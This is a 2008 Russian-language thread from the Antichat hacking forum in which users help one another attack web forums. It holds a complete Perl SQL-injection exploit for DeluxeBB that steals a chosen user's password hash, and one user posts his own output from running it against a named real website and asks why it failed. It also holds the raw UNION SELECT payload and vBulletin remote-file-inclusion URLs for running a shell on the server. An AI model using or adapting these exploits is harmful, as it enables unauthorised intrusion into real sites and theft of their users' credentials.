ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

30.05.2008, 15:51
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
Вывод не отключен, а как вычислить количество полей во втором запросе ?
|
|
|

30.05.2008, 15:56
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме: 13395217
Репутация:
2097
|
|
Ну а дальше как с простой скулей, подбирай поля при помощи order by
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|

30.05.2008, 17:03
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от .Slip
union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.
Я говорю что вообще это вожможно)
Сообщение от 0nep@t0p
Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.
__________________
|
|
|

30.05.2008, 17:29
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме: 163552
Репутация:
1
|
|
Ребятки подскажите, пожалуйста, почему не работает Exploit.
Exploit…
Код:
#!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED ";
print "[~] SENDING QUERY... ";
print $socket "GET $path HTTP/1.1 ";
print $socket "Host: $server ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
print "[+] DONE! ";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1." ";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
#########################################################
C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
--------------------------------------------------------------------------------
----------------
[>] SERVER: www.forum.profiforex.ru
[>] DIR: /
[>] USERID: 24
--------------------------------------------------------------------------------
----------------
[~] PREPARE TO CONNECT...
[+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]-----------------------
-------------------------------------------------------------
--------------------------------------------------------------------------------
----------------
Вернее он работает, но как-то не информативно.
|
|
|

30.05.2008, 17:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
дык могет форум та не бажный 
|
|
|

30.05.2008, 17:32
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
У меня никогда этот сплойт не работал.
__________________
|
|
|

30.05.2008, 17:33
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме: 163552
Репутация:
1
|
|
Сообщение от Gorev
дык могет форум та не бажный 
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
|
|
|

30.05.2008, 17:37
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме: 163552
Репутация:
1
|
|
Так тоже пытался…
Только вот что-то не очень получается…
Или это у меня руки кривые…!?
vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
|
|
|

30.05.2008, 17:42
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме: 447871
Репутация:
208
|
|
Сообщение от SeeJay
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
|
|
|

30.05.2008, 17:45
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме: 163552
Репутация:
1
|
|
Сообщение от [:|||||:]
А саму скулю подставлял:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
Подставлял!
Похоже и правда профиксено!
Ничего нету не ошибки, не информации!
Ребятки подскажите, что еще можно туда вставить!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|